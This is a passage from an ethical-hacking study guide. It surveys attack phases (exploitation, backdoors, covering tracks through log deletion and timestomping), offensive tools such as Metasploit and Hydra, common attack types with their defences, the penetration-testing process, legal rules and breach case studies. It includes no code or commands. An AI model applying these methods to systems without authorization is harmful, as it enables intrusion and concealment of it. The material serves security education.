OpenVAS, Nikto. Gaining Access: o Goal: Exploit vulnerabilities to get into the target system. o Methods: Exploitation: Using tools to exploit vulnerabilities (e.g., buffer overflow, SQL injection). Brute Force: Repeatedly guessing passwords or keys. o Tools: Metasploit, Hydra, SQLmap. Maintaining Access: o Goal: Stay in the system once you’re in. o Methods: Backdoors: Installing something that lets you back in later (e.g., Netcat, Meterpreter). Privilege Escalation: Getting higher permissions than you originally had. o Tools: Netcat, Meterpreter, Cobalt Strike. Covering Tracks: o Goal: Hide any evidence of your activity. o Methods: Log Manipulation: Deleting or editing log files. Timestomp: Changing timestamps on files to avoid detection. o Tools: Metasploit, Timestomp, CCleaner. 4. Common Tools in Ethical Hacking Nmap: o What It’s For: Network scanning and finding out what’s open and what’s not. o Capabilities: Can identify open ports, services, and even guess what OS the target’s using. Wireshark: o What It’s For: Analyzing network traffic. o Capabilities: Captures packets to see what data is being sent around. Super handy for spotting suspicious stuff. Metasploit: o What It’s For: Penetration testing. o Capabilities: Packed with exploits, payloads, and all sorts of tools for finding and using vulnerabilities. John the Ripper: o What It’s For: Password cracking. o Capabilities: Can guess passwords using brute force or by trying out common words from a dictionary. Burp Suite: o What It’s For: Web app security testing. o Capabilities: Can scan websites for vulnerabilities like SQL injection, XSS, and more. Nessus/OpenVAS: o What They’re For: Vulnerability scanning. o Capabilities: They scan networks, systems, and apps for known vulnerabilities. Hydra: o What It’s For: Brute force password cracking. o Capabilities: Can try to crack passwords over multiple protocols like HTTP, FTP, SMTP, etc. 5. Vulnerabilities and Exploits Vulnerability: o What It Is: A weak spot in a system that a hacker can take advantage of. o Examples: Unpatched software, weak passwords, or poorly configured systems. Exploit: o What It Is: A way to take advantage of a vulnerability to gain unauthorized access. o Examples: RCE (Remote Code Execution): Running code on a remote system. SQL Injection: Inserting malicious SQL code to mess with a database. 6. Encryption and Cryptography Encryption Methods: o AES (Advanced Encryption Standard): What It’s Used For: Encrypting data. It’s strong and widely used. Key Sizes: 128, 192, or 256 bits. o RSA (Rivest-Shamir-Adleman): What It’s Used For: Securing data transmission, like sending encrypted emails. Key Sizes: Usually 2048-bit keys. o Symmetric vs. Asymmetric Encryption: Symmetric: Same key for encryption and decryption (e.g., AES). Asymmetric: Different keys for encryption and decryption (e.g., RSA). RSA is usually used to secure the key exchange rather than the data itself. o Hashing Algorithms: MD5 and SHA-1: Old but still around. They’ve got vulnerabilities, so they’re not recommended for critical stuff. SHA-256: More secure and used in things like blockchain and digital signatures. SSL/TLS: o What It’s For: Encrypting data sent over the internet (like HTTPS). o Importance: Keeps your data safe while it’s being transmitted. 7. Network Security Concepts Firewalls: o Types: Network-based: Protects entire networks (like a castle wall). Host-based: Protects individual devices (like personal armor). o Functions: Blocks unauthorized traffic and lets the good stuff through. Intrusion Detection Systems (IDS): o Types: NIDS (Network IDS): Monitors network traffic for signs of trouble. HIDS (Host IDS): Monitors individual devices for suspicious changes or activity. o Examples: Snort, Suricata. Intrusion Prevention Systems (IPS): o What They Do: Like IDS, but they don’t just detect - they block the bad stuff too. o Examples: Cisco IPS, Palo Alto Networks. Honeypots: o What They’re For: Luring in attackers so you can study them. o Types: Low-Interaction: Simulates basic services and captures simple attacks. High-Interaction: Provides a more realistic environment and can catch more sophisticated attacks. o Benefits: Learning: You get to understand what attackers are up to. Detection: Spotting new threats before they hit real systems. o Risks: Attracting Trouble: You might end up inviting real attacks. Maintenance: Takes time and effort to keep these things running smoothly. 8. Social Engineering What It Is: Tricking people into giving up confidential info or doing something they shouldn’t. Types: o Phishing: Sending fake emails or messages to trick people into giving up info. o Spear Phishing: Targeted phishing aimed at specific people or companies. o Pretexting: Pretending to be someone else to get info. o Baiting: Offering something tempting (like a free USB drive) to trick someone into doing something. o Tailgating: Following someone into a restricted area without them noticing. How to Protect Against It: o Training: Keep employees up to date on the latest scams. o Verification: Double-check before sharing sensitive info. o Email Filters: Use advanced spam filters to catch phishing attempts. Note: Social engineering tactics evolve all the time. It’s a cat-and-mouse game, so staying updated is key. 9. Types of Cyber Attacks Denial of Service (DoS) and Distributed Denial of Service (DDoS): o What It’s About: Flooding a system or network to make it crash or become unavailable. o Methods: Flood Attacks: Sending tons of traffic to overwhelm the target. Amplification Attacks: Using other servers to increase the amount of traffic. o How to Defend: DDoS protection services like Cloudflare, rate limiting, and segmenting the network. Man-in-the-Middle (MitM): o What It Is: Intercepting and potentially altering communication between two parties. o Techniques: ARP Spoofing: Tricking devices into sending traffic to the attacker’s machine. SSL Stripping: Downgrading HTTPS connections to HTTP to intercept data. o How to Defend: Use HTTPS with strong certificates, VPNs, and mutual authentication. SSL stripping is getting harder to pull off, especially with HSTS in place. SQL Injection: o What It Is: Injecting malicious SQL code into a query to manipulate the database. o Where It Happens: Mostly in web apps with input fields that aren’t properly secured. o How to Defend: Use prepared statements, parameterized queries, and sanitize inputs. Cross-Site Scripting (XSS): o What It Is: Injecting malicious scripts into web pages viewed by other users. o Types: Stored XSS: The malicious script is saved on the server and affects everyone. Reflected XSS: The malicious script is reflected off a web server, usually via a query parameter. o How to Defend: Sanitize input, escape output, and use Content Security Policy (CSP). Buffer Overflow: o What It Is: Overwriting a part of memory to execute malicious code. o Methods: Stack Overflow: Overflows a buffer on the stack. Heap Overflow: Overflows a buffer on the heap. o How to Defend: Write secure code, use ASLR (Address Space Layout Randomization), and stack canaries. 10. Penetration Testing Process Planning and Recon: o Goal: Set the scope, objectives, and rules for the pen test. o Methods: Stakeholder Interviews: Find out what’s important and needs protection. Legal Checks: Make sure everything is legally sound and authorized. Scanning: o Goal: Identify systems, services, and any possible weak spots. o Methods: Network Mapping: Using tools like Nmap to see what’s out there. Vulnerability Scanning: Tools like Nessus to find known weaknesses. Exploitation: o Goal: Try to gain unauthorized access. o Methods: Manual Exploitation: Using knowledge of vulnerabilities to craft specific attacks. Automated Tools: Using frameworks like Metasploit to run known exploits. Post-Exploitation: o Goal: See how deep you can go and the potential impact. o Methods: Privilege Escalation: Getting more control in the system. Data Exfiltration: Simulating stealing sensitive data. o Lateral Movement: Moving across the network to access more systems. o Persistence: Setting up a way to get back in later. Reporting: o Goal: Document everything you found and suggest fixes. o What to Include: Executive Summary: Overview for non-tech folks. Technical Report: Detailed findings and technical suggestions. Fix-It Plan: How to fix the problems you found. 11. Legal and Ethical Considerations Authorization: Always get explicit written permission before starting anything. This is not negotiable. Compliance: Know the laws and rules that apply to your work, like CFAA in the U.S. or GDPR in Europe. Documentation: Keep detailed records of everything you do during a test, just in case. Ethical Rules: o Honesty: Be transparent about what you’re doing and what you find. o Confidentiality: Keep any sensitive info you come across safe and secure. o Professionalism: Always act in a professional and ethical way. 12. Real-World Applications and Case Studies Case Study 1: Target Data Breach: o What Happened: Hackers got in through a third-party vendor (HVAC) and installed malware on Target’s payment systems, stealing 40 million credit card numbers. o Lesson Learned: Third-party access needs to be locked down tight, and network segmentation is crucial to limit damage if someone does get in. Case Study 2: Equifax Data Breach: o What Happened: A vulnerability in a web application was exploited, leading to the exposure of data for over 147 million people. o Lesson Learned: Timely patching is critical, and regular vulnerability scans are a must. Best Practices: o Defense in Depth: Layer your security controls to make it harder for attackers to succeed. o Zero Trust Architecture: Don’t trust anyone or anything by default, and always verify. o Continuous Monitoring: Keep an eye on your network and systems all the time, and have a solid incident response plan ready to go.